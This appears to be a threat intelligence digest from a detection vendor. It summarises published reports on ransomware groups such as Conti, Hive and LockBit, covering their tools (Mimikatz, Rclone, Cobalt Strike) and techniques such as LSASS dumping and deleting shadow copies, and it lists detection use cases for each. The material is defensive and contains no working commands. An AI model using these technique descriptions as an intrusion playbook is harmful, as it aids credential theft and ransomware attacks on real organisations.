Unraveling Wizard Spider’s Operations

May 24, 2022

Unraveling Wizard Spider’s Operations

Industry: N/A | Level: Tactical | Source: Hacker News

Intelligence collected from Prodraft revealed the nuances of the cybercriminal group, Wizard Spider’s organizational structure, and goals. The group’s financial successes provides funding to advance their research and development plans, maintaining a effective toolset is a priority for the group. A hash cracking system was discovered by the team capable of unraveling “LM:NTLM hashes, cached domain credentials, Kerberos 5 TGS-REP/AS-REP tickets, KeePass files, MS Office 2013 files, and other types of common hashes.” Additionally, a cold-calling system used to pressure non-responsive victims into complying with the group’s ransom was reviewed. Wizard Spider’s primary method of initial access comes from distributing spam emails containing Qakbot malware or proxy malware such as SystemBC. Additionally, the group is found to be leveraging an exploit kit incorporating the Log4Shell vulnerability. Once the network has been infiltrated, the threat group conducts reconnaissance to identify high-value targets. Cobalt Strike is deployed to assist with lateral movement and the group prioritizes obtaining domain admin privileges to be able to deploy Conti ransomware. Various tools are identified to be used by Wizard Spider including numerous PowerShell scripts, Rubeus, SecretsDump, Adfind, Mimikatz, FileZilla, and Rclone.

Anvilogic Use Cases:

  • Executable Create Script Process
  • Rubeus Commands
  • Locate Credentials
  • Query Registry
  • NTDSUtil.exe execution
  • SecretsDump Credential Harvest
  • Adfind Execution
  • Adfind Commands
  • Mimikatz
  • Rclone Execution
  • Windows FTP Exfiltration

AvosLocker Infection with Abused Driver

May 10, 2022

Trend Micro observed a AvosLocker infection chain deployed within the US abusing a legitimate Windows driver for defense evasion and to disable security defenses.

Ransomware Attack Techniques

May 03, 2022

Ransomware Attack Techniques

Industry: N/A | Level: Tactical | Source: Symantec

Symantec’s analysis of ransomware groups Hive, Conti, and Avoslocker, have identified frequently utilized tools, tactics, and procedures (TTPs). During the initial access stage of the attack, the ransomware operators leverage exploits, RDP from weak or compromised credentials, and malware deployment through phishing emails involving IcedID, Emotet, QakBot, or TrickBot. Persistence involved the use of third-party remote software such as AnyDesk and ConnectWise Control along with modifications to the firewall and registry. Tools used for system discovery include ADRecon and Netscan. Credential access is achieved with a vast array of techniques involving Mimikatz, comsvcs.dll, extracting credentials from the registry, and using task manager to dump LSASS memory. Tools used for lateral movement includes PsExec, WMI, BITSAdmin, and Mimikatz. The tampering of Windows logs helped cover the attacker’s tracks. Data recovery is inhibited by deleting shadow copies. Lastly, for data exfiltration, actors relied on RClone and FileZilla to transfer data.

  • Anvilogic Use Cases:
    • Registry key added with reg.exe
    • Windows Firewall Rule Creation
    • Mimikatz
    • Invoke-Expression Command
    • comsvcs.dll Lsass Memory Dump
    • Rundll32 Command Line
    • Task Manager lsass Dump
    • Credentials in Registry
    • Remote Admin Tools
    • WinRM Tools
    • BITSadmin Execution
    • Clear Windows Event Logs
    • Inhibit System Recovery Commands
    • Suspicious Registry Key Deleted
    • Rclone Execution

Red Canary’s Intelligence Insights

May 03, 2022

Red Canary’s Intelligence Insights

Industry: N/A | Level: Tactical | Source: RedCanary

Red Canary’s intelligence insights of threats observed during March 2022 have identified a shift in rankings. SocGholish, previously the top threat slipping to number #8 on the list and Impacket claiming the top spot. The top five threat rankings (highest to least) include Impacket, Mimikatz, Yellow Cockatoo, Cobalt Strike, and BloodHound. Additionally, Emotet has risen on the threat list to the 6th spot (previously #8, and Qbot/Qakbot has dropped to 9th (previously #4)). The Qbot malware was observed in April 2022, adjusting it’s delivery techniques to now incorporate Windows Installer (MSI) packages, when previously utilizing malicious office macros and compressed zip files. Microsoft’s decision to block VBA macros by default, since January 2022, has caused threat actors to adjust.

  • Anvilogic Use Cases:
    • Suspicious Email Attachment
    • Compressed File Execution
    • MSIExec Install MSI File

Hive Ransomware Attack Analysis

April 26, 2022

The Varonis Forensics Team has provided an investigation from an incident involving Hive ransomware, spanning under 72 hours to execute. The initial attack began by exploiting the Exchange Proxyshell vulnerability to load a webshell on the Exchange server.

eSentire Conti Leaks Analysis

April 05, 2022

eSentire Conti Leaks Analysis

Industry: N/A | Level: Tactical | Source: eSentire

eSentire’s Threat Response Unit (TRU) dove into Conti intrusion procedures sharing detection tactics from the group’s 2021 and 2022 data leaks containing operation manuals and chat logs. The ransomware group’s chat logs, from the recent February 2022 data leak, often reference the usage of manuals that assist Conti operators to carry out their operations. The ransomware gang operates with a clear structure, involving a management chain, organized personnel with roles and responsibilities and training programs. The reference materials help to ensure Conti operators initiate their threat activity with consistency and efficiency. Analysis of the tools identified the reliance on many known tools and techniques including AdFind, Cobalt Strike, Mimikatz, Powerview, 7zip, AnyDesk, Rubeus, Rclone and native living off the land binaries (LOLBins).

  • Anvilogic Scenario: ZeroLogon Compromise
  • Anvilogic Use Cases:
    • Adfind Commands
    • Adfind Execution
    • Common Reconnaissance Commands
    • Cobalt Strike Beacon
    • Cobalt Strike style Shell invocation
    • Create/Add Local/Domain User
    • Locate Credentials
    • Mimikatz
    • Modify Group Policy
    • Native Archive Commands
    • Potential Web Shell
    • Registry key added with reg.exe
    • Rclone Execution

UNC2596 & Cuba Ransomware

March 01, 2022

UNC2596 & Cuba Ransomware

Industry: Construction Engineering, Education, Energy, Financial, Government, Healthcare, Legal, Manufacturing, Media, Oil, Technology and Transportation | Level: Tactical | Source: Mandiant

Mandiant reports activity from threat group, UNC2596, deploying Cuba/COLDDRAW ransomware utilizing Exchange vulnerabilities ProxyShell and ProxyLogon. The threat group has targeted over 10 countries with 80% of the organizations based in North America. Industry targets involved many different verticals including construction engineering, education, energy, financial, government, health care, legal, manufacturing, media, oil, technology and transportation. The threat group’s extortion model incorporates a shaming website distributed to victims since 2021. UNC2596 attack tactics have included Mimikatz and user account creation for privilege escalation. Reconnaissance has involved a ping sweeping tool and a PowerShell script that uses “Get-ADComputer”. Lateral movement is facilitated with the use of RDP, SMB, and PsExec. UNC2596 completes its operation by collecting, encrypting and exfiltrating data using batch scripts.

  • Anvilogic Use Cases:
    • Potential ProxyShell
    • Potential PHP Webshell
    • Mimikatz
    • Create/Add Local/Domain User
    • Potential Ping Sweep
    • Common Active Directory Commands
    • Remote Admin Tools
    • RDP Hijacking

FBI Flash Report for LockBit 2.0

February 15, 2022

FBI Flash Report for LockBit 2.0

Industry: N/A | Level: Tactical | Source: IC3

The FBI released details associated with Ransomware-as-a-Service (RaaS) LockBit 2.0 that’s been active since September 2019. The threat groups initial access vectors leverage paid access, exploiting vulnerabilities, insider threat, and zero-day exploits. The group has a large arsenal of private and public tools, with the usage of public tool Mimikatz to escalate privileges. Upon execution of the LockBit 2.0 ransomware, the malware conducts a system language check to ensure the target is not “Eastern European” if the system is, then the malware will exit the infection routine. The infection routine as documented begins with “Lockbit 2.0 deletes log files and shadow copies residing on disk. Lockbit 2.0 enumerates system information to include hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices. Lockbit 2.0 attempts to encrypt any data saved to any local or remote device, but skips files associated with core system functions. Once completed, Lockbit 2.0 deletes itself from disk and creates persistence at startup.” For data exfiltration there are a variety of publicly available tools like Rclone, MEGAsync as well as public file-sharing services.

  • Anvilogic Use Cases:
    • Mimikatz
    • New AutoRun Registry Key
    • Rclone Execution

Midas Ransomware

February 01, 2022

Midas Ransomware

Industry: Technology | Level: Tactical | Source: Sophos

Sophos reported, deployment of Midas ransomware against a technology vendor in December 2021. A review of the threat indicators identified the attackers were active on the network for at least two months with the earliest indicator of compromise found on October 13th, 2021. The organization’s network was unfortunately not complicated following a flat topology with no network segmentation. The attackers also took advantage of commercial remote access tools, AnyDesk and TeamViewer, to move laterally in the network as the organization had utilized the software previously for tests, however, did not uninstall them from the servers. Identified by Sophos a unique aspect of the compromise, involves the attackers crafting and installing PowerShell scripts as services prior to the deployment of ransomware. The activity was carefully engineered during the two months they were on the network. Due to a visibility gap, it is unknown how the attackers accessed the domain controller or obtained Admin permissions. Threat activity progressed slowly from October 13th to November 2nd and picked up again on November 25th with ransomware deployment on December 7th. Observed threat activity on the network included using process hacker to identify processes, Mimikatz for credential harvesting, execution of scripts from TEMP and AppData directories and exfiltrating data to a cloud service.

  • Anvilogic Use Cases:
    • Windows Service Created
    • Obfuscated Powershell Techniques
    • RDP Hijacking
    • Mimikatz
    • Executable Process from Suspicious Folder

Red Canary Intelligence Insights from October 2021

November 23, 2021

Red Canary Intelligence Insights from October 2021

Industry: N/A | Level: Tactical | Source: RedCanary

Intelligence insights from October 2021, provided by Red Canary, show Mimikatz, Yellow Cockatoo/Jupiter infostealer and TA551 as the top three threats out of five since August. Notable rises to the top ten threats are Qbot and Wannacry.

Anvilogic Use Case

    • Mimikatzs
    • Certutil File Download
    • Windows Copy Files
    • Inhibit System Recovery Commands
    • Clear Windows Event Logs
    • Windows Firewall Disabled